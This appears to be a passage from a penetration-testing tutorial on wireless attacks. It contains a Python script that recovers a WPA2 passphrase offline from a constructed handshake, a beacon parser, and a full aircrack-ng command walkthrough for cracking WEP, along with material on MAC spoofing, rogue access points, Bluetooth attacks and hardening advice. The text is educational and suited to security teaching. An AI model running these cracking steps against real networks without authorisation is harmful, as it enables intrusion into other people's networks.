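The offline handshake attack and the dictionary attack above both come down to the same computation, shown here as an added Python example that is not from the original post or from aircrack-ng. It uses only the standard library: PBKDF2 turns a candidate passphrase plus SSID into the PMK, the 802.11i PRF expands PMK, MAC addresses and nonces into the PTK, and the first 16 bytes of the PTK (the KCK) key the HMAC-SHA1 MIC over the EAPOL frame. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are all constructed inline (the MIC is computed from a passphrase the cracker is not given); in a real test they are parsed from the .cap file airodump-ng wrote.

```python
"""Added example, not from the original post: offline recovery of a WPA2-PSK
passphrase from a captured 4-way handshake, the computation aircrack-ng performs
for each candidate word. The handshake below is constructed here from a known
passphrase so the script runs offline; on a real engagement the SSID, MACs,
nonces, EAPOL frame and MIC come from the capture file."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the slow step, repeated once per candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).
    For CCMP the 48 bytes split into KCK (16) | KEK (16) | TK (16)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_with_zero_mic: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1(KCK, EAPOL-Key frame with MIC zeroed)[:16].
    WPA/TKIP (version 1) uses HMAC-MD5 instead."""
    return hmac.new(kck, eapol_with_zero_mic, hashlib.sha1).digest()[:16]


def eapol_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with the MIC field zeroed."""
    body = (b"\x02"                         # descriptor type: RSN
            + b"\x01\x0a"                   # key info: version 2 (HMAC-SHA1), pairwise, MIC present
            + b"\x00\x10"                   # key length 16 (CCMP)
            + (1).to_bytes(8, "big")        # replay counter
            + snonce                        # SNonce
            + bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID (unused in message 2)
            + bytes(16)                     # MIC field, zeroed for the computation
            + b"\x00\x00")                  # key data length 0 (real frames carry the RSN IE here)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X version 1, type EAPOL-Key


def crack(handshake: dict, wordlist):
    """Return the first candidate whose derived KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        kck = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                           handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return candidate
    return None


def build_capture(passphrase: str) -> dict:
    """Constructed stand-in for the handshake fields parsed out of a .cap file."""
    hs = {
        "ssid": "CorpGuest",                                     # constructed network name
        "ap_mac": bytes.fromhex("000c4210ab01"),                 # constructed BSSID
        "sta_mac": bytes.fromhex("4460572c58a0"),                # constructed client MAC
        "anonce": bytes(range(32)),                              # constructed ANonce (message 1)
        "snonce": bytes((i * 5 + 1) & 0xFF for i in range(32)),  # constructed SNonce (message 2)
    }
    hs["eapol"] = eapol_msg2(hs["snonce"])
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, hs["ssid"]),
                       hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
    hs["mic"] = eapol_mic(kck, hs["eapol"])                      # what the client actually sent
    return hs


CAPTURE = build_capture("letmein2015")                           # passphrase the cracker is not given
WORDLIST = ["password", "CorpGuest", "welcome1", "letmein2015", "summer2015"]  # constructed wordlist

if __name__ == "__main__":
    print("recovered passphrase:", crack(CAPTURE, WORDLIST))
```

Nothing in crack() touches the network, which is the point of the offline attack: the only cost is the PBKDF2 per guess, and the only defense is a passphrase that is not in anyone's wordlist.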
While carrying out these attacks is possible using Linux-based tools such as Kali Linux or the aircrack-ng suite, other options are available. A company called Pwnie Express has two devices, the Pwn Pad and the Pwn Phone, that make cracking wireless easier than ever before.
Both devices offer a built-in suite of tools used for all sorts of security audits and tests, including tools that can very quickly break WEP, WPA, and WPA2.
Both have the advantage of using off-the-shelf hardware such as the Nexus 5 and Nexus 7, which can make them very easy to hide. They also don’t look overly suspicious when they are observed by a third party. The downside is that they are rather pricey—over a thousand dollars a piece.
Though you can purchase a device such as the Pwn Pad or Pwn Phone, they may not be the best or most cost-effective option. Both can be homemade by purchasing the tablet or phone from eBay and installing the free versions of the OS (called community editions) from Pwnie Express.
You could also build your own device from scratch using the much more popular Kali Linux pentesting OS in the form of Kali NetHunter.
The benefit in this route is that it works on many more devices and is more flexible, much better documented, and highly customizable—as well as being free.
Exploring Wireless Deployment Options
There are numerous ways to deploy a wireless network. As a pentester, you should be aware of these different types since they may be useful to you in planning or carrying out a test. Understanding the various types of network deployments for wireless can greatly assist you when planning your attack.
For example, being able to identify a 4G hotspot may allow you to target a user who is using their phone to establish a wireless connection while attached to a physical network.
In this case, the user may be opening up a backdoor into the main network. Targeting a site-to-site WLAN could be effective if you wish to carry out a denial-of-service attack and break connectivity between locations.
One of the common ways to create a wireless network nowadays is through the use of a 3G/4G hotspot. A 3G/4G hotspot is a wireless network that is deployed by using a special cellular-enabled access point or by using a cell phone that can be turned into an access point with a simple “push” of a button.
Encountering these devices is common, since just about every smartphone has this capability as a standard function.
Networks using a cellular access point have another common property: their form factor. Many such access points are small and come in the form of a cell phone or tablet.
This illustrates both a benefit and a security issue with these access points: they don't look like access points and are only one feature of a very common device. They can be easily concealed and blend in with the everyday kit someone would carry, so they do not raise suspicion.
Extension to an existing network is the type of network deployment that uses access points that are attached to a hardwired network and allow the reach of the existing network to go further. Interestingly enough, the types of access points encountered in this type of network can be hardware or software in nature.
The latter type of access point (the software type) is typically accomplished by sharing a wireless adapter to other devices and thus allowing them to attach to the client.
Multiple access points are another commonly encountered deployment type, using several access points to cover a large area. This type of deployment is found in locations such as hotels, conference centers, and schools and provides more than one access point for clients to attach to as needed.
Much like cellular networks, it requires each access point's coverage to overlap to some degree with that of its neighbors. When set up correctly, this allows clients to roam from location to location seamlessly without losing connectivity.
A LAN-to-LAN wireless network allows networks in close but different physical locations to be connected through wireless technology.
This has the advantage of allowing connection between locations that may otherwise have to use a more expensive connectivity solution such as paying to dig up a street to lay a physical cable. This type of deployment is also sometimes referred to as a site-to-site wireless LAN (WLAN).
So how can you thwart many of the attacks discussed here that target WEP and WPA? Excluding encryption and other mechanisms, some of the leading techniques include the following and are commonly used by consumers:
Use a long, complex passphrase as the key. Using the same rules you saw earlier for passwords, you can make a strong key for the AP; this is the single control that defeats the offline handshake attack, since a passphrase that is in no wordlist cannot be guessed in practical time.
On Enterprise (802.1X) networks, configure clients to validate the authentication server's certificate so that the client has a positive ID of the AP it is connecting to and cannot be lured to a rogue one.
Eliminate WEP and WPA and move to WPA2 (or WPA3 where supported). Use AES-CCMP as the cipher; do not allow TKIP, which carries the WEP-era weaknesses forward.
Disable WPS on the access point.
Use MAC filtering on the access point. This raises the bar only slightly: allowed addresses are visible in the clear to a sniffer and, as described later under MAC spoofing, are trivial to clone.
Disable the SSID Broadcast option in your router. This hides the name from casual browsing, but the SSID still appears in probe and association frames, so wardriving tools recover it as soon as a legitimate client connects.
With an understanding of the various security technologies, you now need to know how networks can be found in the first place.
Conducting a Wardriving Attack
Wardriving is a common means of targeting wireless networks. The attack consists of an attacker driving around an area with a computing or mobile device that has both a wireless card and software designed to detect wireless clients or access points.
In this exercise, you will set up and configure a system to perform a wardriving operation. This exercise provides the general steps and items you will need to perform this operation, but you may need to tailor certain steps for your hardware and setup where noted.
A word of caution: Keep safety and the law in mind when performing this exercise. If you choose to actually drive around using this setup, remember that you should first start the system up and get it scanning while you are stopped. You should place the notebook on the floor of the vehicle on the passenger side or back seat of the car.
Additionally, the notebook screen should never be in view of the driver unless the car is safely stopped or parked; having a computer screen in view of the driver is illegal in most states.
Perform this activity with someone else driving while you test it out. Before you start this exercise, you will need the following:
Software such as Vistumbler or KisMAC
Mapping software or service such as WiGLE
Hardware: a USB GPS device
A notebook with a wireless card (Note that the frequencies your wireless card supports will be the only ones you will be able to detect; if this is insufficient for your needs, you will need to get an external USB adapter.)
Here are the steps:
1. Install the software of your choice as defined by your operating system.
2. Register for an account on the WiGLE website in order to upload the data that you have collected regarding access points and locations.
3. Ensure that the drivers for your wireless card or adapter are updated to the latest version.
4. Install your GPS device and load the necessary drivers for your operating system.
5. Start up your software (such as Vistumbler).
6. Configure your software to recognize your GPS (if necessary).
7. Let the system run for a few moments to allow it to detect wireless networks. If successful, proceed to the next step. If not, refer to your software or hardware vendor’s website to troubleshoot and test again.
8. Drive around with the system running for a time, with the software detecting access points.
9. After a period of time, you can save a log of the activity to your hard drive.
10. Once the information is saved, you can upload it to WiGLE, which will plot out the locations on a map.
In this type of attack, wireless detection software will either listen for the beacon of a network or send off a probe request designed to detect the network. Once a network is detected, it can then be singled out for later attack by the intruder.
It is common for site survey tools to also include the ability to connect to a GPS device in order to pinpoint an access point or client within a few feet. There are also variations of the wardriving attack, all of which have the same objective:
Warflying Same as wardriving, but using a small plane or ultralight aircraft
War ballooning Same, but makes use of a balloon instead
Warwalking Involves putting the detection equipment in a backpack or something similar and walking through buildings and other facilities
Something that works with these techniques is known as warchalking, or the placement of symbols in locations where wireless signals were detected. These symbols tell the informed that a wireless access point is nearby and provide data about it, including open or closed access points, security settings, channel, and name.
Conducting Other Types of Attack
These are other ways to get at a wireless network:
Rogue access points are an effective way of breaching a network by tempting users to connect to the access point. To carry out this attack, the attacking party will set up an access point that is outside of the company’s control.
Once victims attach to the access point, they may start to transmit information (including sensitive company data) over the network, potentially compromising security.
This type of attack is very easy to perform through the use of readily available compact hardware access points as well as software-based access points. In both cases, the access points are easy to hide as well as easy to configure.
MAC spoofing defeats MAC filtering, the access point feature that controls which client hardware addresses can attach. MAC addresses are never encrypted, so by using a sniffer (airodump-ng's STATION column is enough) you can view the MACs of clients that the access point already accepts and set your own adapter to one of them.
Typically tools such as SMAC on Windows or macchanger, ifconfig, or ip link on Linux are used to accomplish this. In some cases, the driver or hardware settings for a network card allow the MAC to be changed without such applications.
Misconfiguration is a common problem—many hardware and software items can be misconfigured. The owner of a device could easily misconfigure a device and reduce or negate the device’s security features.
A wireless access point provides an ideal “access anywhere” solution for attackers or other malicious parties that can’t physically connect to the network.
Client misassociation is a type of attack that starts with a victim attaching to an access point that is on a network other than their own. Because of the way wireless signals propagate through walls and many other structures, a client can easily detect another access point and attach to it either accidentally or intentionally.
In either case, a client may attach to a network that is unsafe, perhaps while still connected to a secure network.
A promiscuous client offers a strong signal intentionally for malicious purposes. Wireless cards often look for a stronger signal to connect to a network. In this way, the promiscuous client grabs the attention of the users by sending a strong signal.
Another potential attack is the process of jamming the RF signal being used by a wireless network. Jammers are available that specifically target wireless networks in both the 5 GHz and 2.4 GHz range.
This action creates an issue with the availability of the network and results in a targeted denial-of-service attack against access points in the area. It is possible to use a specially designed jammer that can transmit signals that can overwhelm and deny the use of the access point by legitimate clients.
Note that jamming, while effective, is not something that should be carried out unless special permission is obtained. Deliberately blocking RF signals of any type is illegal in most jurisdictions and can result in substantial fines if you are caught.
Most, if not all, jammers are only available from overseas sources such as China. Seriously consider if trying this type of attack is something that needs to be done and, if so, how you will obtain permission from the applicable regulatory agencies.
A honeypot attack partly relies on social engineering and an understanding of how people use technology. Users can (and do) connect to any available wireless network they can find and may inadvertently attach to a network that is malicious.
In such a situation, an attacker can attract unknowing or unsuspecting users to attach to the access point that they themselves control.
To carry out this type of attack, a malicious party must set up a rogue access point (typically in the range of legitimate ones where possible). With the rogue access point generating a much stronger and clearer signal, it is possible to attract clients looking for an access point to attach to.
Once this has taken place, a malicious attacker can choose to view, modify, or block network traffic.
Choosing Tools to Attack Wireless
Several tools and mechanisms make locating a target network easy. Once you locate a wireless network, it is possible to strike it.
Picking a Utility
The following are methods that can complement wardriving or be used on their own:
OpenSignal This app runs on mobile devices and also offers a web-based cell coverage map. You can use it to map out Wi-Fi networks and 3G/4G networks, as well as correlate this information with GPS data.
Kismet A Linux-based tool that is effective in locating wireless networks passively, meaning that the tool does not do much to reveal its presence to those who may be looking or listening.
InSSIDer This utility can be used to locate wireless networks in an area and provide information on channels, frequency, and signal power.
Network Signal Info This application is available for the Android operating system and can be used to both analyze and locate wireless networks.
Wireshark is a general-purpose sniffer but can also be used to capture and dissect wireless traffic. On Linux it needs only an adapter in monitor mode (airmon-ng); on Windows, where most drivers cannot expose raw 802.11 frames, the AirPcap USB adapter is required. With either, it is possible to analyze wireless traffic all the way down to the 802.11 management frames, including beacons and the WPA handshake.
Under ideal conditions, these tools can help locate any of the following information about a wireless network:
Presence of multiple access points
Possibility of recovering SSIDs, including hidden ones
Authentication method and cipher in use (advertised in each beacon)
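How a survey tool reads that information out of a beacon, as an added Python example that is not from the original post or from any of the tools listed. The three beacon frame bodies are constructed inline (an open network, a WPA2-PSK network with SSID broadcast disabled, and a WEP network) following the IEEE 802.11 layout of fixed fields followed by tagged information elements, of which the SSID (0), DS Parameter Set (3), RSN (48) and WPA vendor-specific (221) elements are decoded.

```python
"""Added example, not from the original post: pulling SSID, channel and
authentication method out of 802.11 beacon frame bodies, the information that
survey tools derive from the beacons an AP broadcasts. The beacons are
constructed inline; no capture file or adapter is needed."""
import struct

RSN_OUI = b"\x00\x0f\xac"          # suite selector OUI used inside the RSN (WPA2) element
WPA_OUI = b"\x00\x50\xf2"          # Microsoft OUI used by the original WPA vendor element
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP", 5: "WEP-104"}
AKMS = {1: "802.1X", 2: "PSK", 8: "SAE"}


def parse_ies(tagged: bytes):
    """Split the tagged-parameter area into (element id, value) pairs."""
    out, i = [], 0
    while i + 2 <= len(tagged):
        eid, length = tagged[i], tagged[i + 1]
        out.append((eid, tagged[i + 2:i + 2 + length]))
        i += 2 + length
    return out


def parse_suites(value: bytes, oui: bytes) -> dict:
    """Shared layout of RSN and WPA elements: version, group cipher,
    pairwise cipher list, AKM list (each suite = 3-byte OUI + 1-byte type)."""
    def name(suite, table):
        return table.get(suite[3], "unknown(%d)" % suite[3]) if suite[:3] == oui else suite.hex()
    group = value[2:6]
    count, = struct.unpack_from("<H", value, 6)
    off = 8
    pairwise = [value[off + 4 * k:off + 4 * k + 4] for k in range(count)]
    off += 4 * count
    count, = struct.unpack_from("<H", value, off)
    off += 2
    akms = [value[off + 4 * k:off + 4 * k + 4] for k in range(count)]
    return {"group": name(group, CIPHERS),
            "pairwise": [name(s, CIPHERS) for s in pairwise],
            "akm": [name(s, AKMS) for s in akms]}


def summarize_beacon(body: bytes) -> dict:
    """body = beacon frame body after the MAC header:
    timestamp(8) | beacon interval(2) | capability(2) | tagged elements."""
    capability, = struct.unpack_from("<H", body, 10)
    privacy = bool(capability & 0x0010)          # privacy bit: some form of encryption is on
    info = {"ssid": None, "hidden": False, "channel": None, "auth": "Open", "pairwise": []}
    for eid, value in parse_ies(body[12:]):
        if eid == 0:                              # SSID element
            if len(value) == 0 or value == bytes(len(value)):
                info["hidden"] = True             # SSID broadcast disabled: empty or null-filled
            else:
                info["ssid"] = value.decode("utf-8", "replace")
        elif eid == 3:                            # DS Parameter Set: current channel
            info["channel"] = value[0]
        elif eid == 48:                           # RSN element (WPA2 / WPA3)
            s = parse_suites(value, RSN_OUI)
            info["auth"] = ("WPA3-" if "SAE" in s["akm"] else "WPA2-") + "/".join(s["akm"])
            info["pairwise"] = s["pairwise"]
        elif eid == 221 and value[:4] == WPA_OUI + b"\x01" and info["auth"] == "Open":
            s = parse_suites(value[4:], WPA_OUI)  # vendor-specific: original WPA
            info["auth"] = "WPA-" + "/".join(s["akm"])
            info["pairwise"] = s["pairwise"]
    if privacy and info["auth"] == "Open":
        info["auth"] = "WEP"                      # encryption on, but no RSN/WPA element
    return info


def ie(eid: int, value: bytes) -> bytes:
    """Build one tagged element: id, length, value."""
    return bytes([eid, len(value)]) + value


def beacon(capability: int, elements: bytes) -> bytes:
    """Build a beacon body: zero timestamp, 100 TU interval, capability, elements."""
    return bytes(8) + struct.pack("<H", 100) + struct.pack("<H", capability) + elements


# Constructed beacons: open network, hidden WPA2-PSK/CCMP network, WEP network.
OPEN_AP = beacon(0x0001, ie(0, b"CoffeeShop") + ie(3, b"\x06"))
HIDDEN_WPA2_AP = beacon(0x0011, ie(0, b"") + ie(3, b"\x0b")
                        + ie(48, b"\x01\x00" + RSN_OUI + b"\x04"      # version 1, group CCMP
                             + b"\x01\x00" + RSN_OUI + b"\x04"        # one pairwise suite: CCMP
                             + b"\x01\x00" + RSN_OUI + b"\x02"        # one AKM: PSK
                             + b"\x00\x00"))                          # RSN capabilities
WEP_AP = beacon(0x0011, ie(0, b"Linksys") + ie(3, b"\x01"))

if __name__ == "__main__":
    for b in (OPEN_AP, HIDDEN_WPA2_AP, WEP_AP):
        print(summarize_beacon(b))
```

The hidden network shows up with hidden set and no name, which is all a passive listener gets from beacons alone; the SSID itself is recovered from the probe response or association request the next time a real client joins.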
Choosing the Right Wireless Card
If you are going to analyze and interact with wireless networks as a pentester, you need to consider the wireless card or adapter you will be using. For most wireless cards you will not have to think much about the make, model, and manufacturer, since most are compatible with the tools and techniques you will use.
However, the internal adapters of mobile devices such as tablets and cell phones typically do not support the advanced features you need, such as monitor mode and packet injection. This necessitates the use of external adapters.
When purchasing a wireless adapter, consider the following:
The operating system in use
The application in use
Whether packet injection is required (standard Windows drivers do not support monitor mode or packet injection; if this is required, use Linux)
Manufacturer of the wireless card and of its chipset (you must know both, since the two are often made by different companies and driver support follows the chipset)
Whether the adapter supports both monitor and promiscuous modes. If you are using virtualization, you may also need to check that the card works when passed through to the virtual machine; USB adapters generally do, while a built-in card appears to the guest only as a virtual wired NIC.
Let’s put this all together and try breaking WEP using Linux.
In this exercise, you will use Linux with a few tools to crack and retrieve a WEP key. The version of Linux you will use for this exercise is Kali 2.0 and you won’t use virtualization.
(If you choose to use virtualization, you will need to obtain a USB wireless adapter and consult your virtualization software to configure the adapter to be recognized as a wireless card.)
1. Obtain information about your wireless card by running the command iwconfig from the Terminal window.
If your wireless card is detected by your operating system, it will start with the prefix “wlan,” followed by a number.
In most cases, the numbering will start with zero (i.e., wlan0) and will count up from there.
2. Put the wireless adapter into monitor mode so it can pick up all wireless traffic:
airmon-ng start wlan0
where wlan0 is the name your adapter was given. airmon-ng prints the name of the monitor interface it created; older releases call it mon0, newer ones wlan0mon. Use that name in the following commands.
3. Start listening on the monitor interface:
airodump-ng mon0
where mon0 is the monitor interface.
4. airodump-ng now lists the wireless networks in the area, one per line, with their BSSID, channel, encryption (look for WEP in the ENC column) and any associated clients.
5. In the list of networks, locate your target network and note its BSSID and channel.
6. Restart airodump-ng so that it captures only the target network, locked to its channel, and writes the packets to a file (the -w prefix is required; without it nothing is saved):
airodump-ng -c [channel] --bssid [bssid] -w [prefix] [monitor interface]
airodump-ng -c 11 --bssid 00:09:5B:6F:64:1E -w wep mon0
7. Wait for a client to connect so you can obtain its MAC address; associated clients appear under STATION in the airodump-ng display.
8. Replay ARP requests into the network using aireplay-ng. It captures an ARP packet from the client and replays it thousands of times; each replay makes the access point emit a new encrypted packet with a fresh IV, which is what you need to crack WEP. aireplay-ng sends the replayed frames from the client's MAC address (-h), so the access point accepts them:
aireplay-ng -3 -b [bssid of AP] -h [MAC of client] [monitor interface]
aireplay-ng -3 -b 00:09:5B:6F:64:1E -h 44:60:57:C8:58:A0 mon0
The number after aireplay-ng selects the attack mode, not the channel: -3 is ARP request replay. If no client is present, perform a fake authentication first (aireplay-ng -1 0 -e [essid] -a [bssid of AP] -h [your MAC] mon0) and use your own MAC in the -3 command.
The airodump-ng session from step 6 keeps capturing the generated traffic into the file named with the -w prefix in the current folder (wep-01.cap in this example); watch its #Data column climb.
9. Once you have enough IVs (aircrack-ng's PTW attack usually succeeds with several tens of thousands of data packets for a 104-bit key; more never hurts), stop the capture by pressing Ctrl+C.
10. To recover the key, run aircrack-ng against the capture file:
aircrack-ng [filename.cap]
where filename.cap is the name of the capture file. If you have captured enough traffic, aircrack-ng will display the key on your screen in hexadecimal format.
Enter that hex key when connecting to the AP and you should join the network.
Knocking Out Bluetooth
Wi-Fi isn’t the only wireless technology on the block—we can’t leave out Bluetooth. Bluetooth is a series of specifications that refer to a short-range technology that is used to create personal area networks (PANs). This technology is extremely common nowadays and appears in everything from mobile phones to cars and game controllers.
Bluetooth is designed to be a universal standard for communications for devices of all types. The communication protocol operates in the 2.4 to 2.485 GHz band and was developed in 1994 by Ericsson Corp.
Under normal conditions, Bluetooth has a distance of about 30 feet or 10 meters. However, manufacturers can choose to implement measures or features in their products to increase the range of their products substantially. With special antennas, you can extend the range even further.
The process through which two Bluetooth-capable devices connect to each other is known as pairing. Any two Bluetooth-capable devices that share a supported profile can connect to each other.
To do this, a device typically needs to be discoverable so that it transmits its name, class, offered services, and other details. When devices pair, they agree on a shared secret called the link key, derived during the pairing process (from a PIN on older devices). They store this link key to authenticate each other and encrypt traffic on future connections without pairing again.
Much like networking technologies, every device has its own unique 48-bit identifier and generally an assigned name.
Once paired, Bluetooth devices create a piconet (or very small net). In a piconet, there is one master and up to seven active slaves at any one time. Because of the way Bluetooth devices work, the chances of any two devices sharing the same channel or frequency is very low and therefore conflicts are kept to a minimum.
Bluetooth's short range is not in itself the problem; the problem is the perception it creates among users of the technology.
Many users of Bluetooth-enabled devices believe that, because the technology is so short range, it is impervious to attack since attackers would need to be within visual range.
This is not true. With a directional antenna an attacker can reach a device from well beyond its nominal range, and the hacking process is otherwise easy: all they need is the software, a suitable adapter, and some basic knowledge.
So, how good is Bluetooth security? That is still open to debate, but in general it rests on a few techniques. First, frequency hopping, in which the radio changes channel 1,600 times a second during a connection, is used to avoid interference. The master and slave both know the hopping sequence, which is derived from the master's address and clock, and an outsider has to recover those before it can follow a conversation; this slows a casual eavesdropper down but is not a cryptographic protection, since purpose-built sniffers do exactly that. Second, the link key established at pairing is used for authentication and for deriving the (up to 128-bit) encryption key.
The three security modes for Bluetooth are
Security Mode 1 No active security.
Security Mode 2 Service-level security. A centralized security manager handles authentication, configuration, and authorization. This mode may not be activated by the user, and there is no device-level security.
Security Mode 3 Device-level security that is always on. Authentication and encryption are based on a secret key. This mode enforces security for low-level connections.
Much like with wardriving, an attacker who has the software installed on their mobile phone, laptop, or netbook will know which ones to target.
All the hacker has to do is to walk around in public places and let their software do all the work, or they can sit down in a hotel reception or restaurant pretending that they are working.
The whole process is automatic for the hacker because the software in use will scan nearby surroundings for Bluetooth devices.
When the hacker’s software finds and connects to a Bluetooth-enabled cell phone, it can download contact information, phone numbers, calendars, photos, and SIM-card details; make free long-distance phone calls; bug phone calls; and much more.
Types of Bluetooth Attacks
Let’s take a look at some of the attacks you can perform using Bluetooth:
Bluesnarfing The process of gaining unauthorized access to a device and downloading all of its information. In an extreme case, bluesnarfing even opens the door for an attacker to send commands that corrupt or destroy data on the device.
Bluebugging An attack in which an attacker plants software on a device that allows it to become a bugging device on demand. Once your device is bluebugged, the hacker can listen in on anything you and anyone around you are saying.
Bluejacking The process of sending unsolicited messages to a Bluetooth-enabled device; akin to spamming.
Bluesniffing The attacker is capable of viewing information as it flows to and from a Bluetooth-enabled device.
Many of these attacks can be carried out with specialized software and the right hardware. In the case of Bluetooth, you must have an adapter that injects packets into the network and also has sufficient range, allowing it to be out of sight of the victim. Currently, a number of Bluetooth adapters are available that can extend the range of transmissions to over 1000 feet with an external antenna.
Things to Remember About Bluetooth
When working with Bluetooth devices, you should keep some specifics in mind about the devices and how they operate. First, the device can operate in one of the following modes:
Discoverable This allows the device to be scanned and located by other Bluetooth-enabled devices.
Limited Discoverable In this mode, the device will be discoverable by other Bluetooth devices for a short period of time before going back to being nondiscoverable.
Nondiscoverable As the name suggests, devices in this mode cannot be located by scanning. However, a device that already knows the target's address (for example from an earlier pairing) can still connect to it.
In addition to the device being able to be located, it can be paired with other devices to allow communication to occur. A device can be in pairing or nonpairing mode. In pairing mode, it can link with another device.
Hacking the Internet of Things (IoT)
We can’t finish up this blog without discussing something that you need to check for as a pentester: the Internet of Things (IoT). The IoT is a buzzword used to refer to the increasing numbers of objects that can connect to the Internet that don’t fit nicely into the category of computers or other devices.
For example, objects such as appliances, sensors, home automation systems, vehicle media systems, wearable computing devices, and more all come in variations that connect to the Internet for data exchange purposes.
Such systems typically have an embedded OS and a wireless or wired card that can be configured to attach to a home or business network.
The problem with these devices from a security standpoint is simply the fact that most of them don’t have any security. Many of these devices were designed to offer specific functions to the consumer or business, and typically this means that little or no attention was given to security.
Poor or missing security measures can be the bane of network admins—and a potential entry point for you as a penetration tester.
From a penetration tester standpoint, you may want to use your tools to scan for wireless-enabled devices to see if you can identify an IoT device. Once you find such a device, you can attempt banner grabs or port scans to see if you can identify the device.
If you can identify it, do your research to see if you can find potential entry points or vulnerabilities you can exploit. If done right, you can use a compromised device as a pivot point, or a launching point, for deeper strikes into a target network.
From a defensive perspective, these devices should not only be evaluated for security issues, but also placed on their own special network segment. To improve security, any object that needs to be directly accessible over the Internet should be segmented into its own network and have its network access restricted.
The network segment should then be monitored to identify potential anomalous traffic, and action should be taken if there is a problem.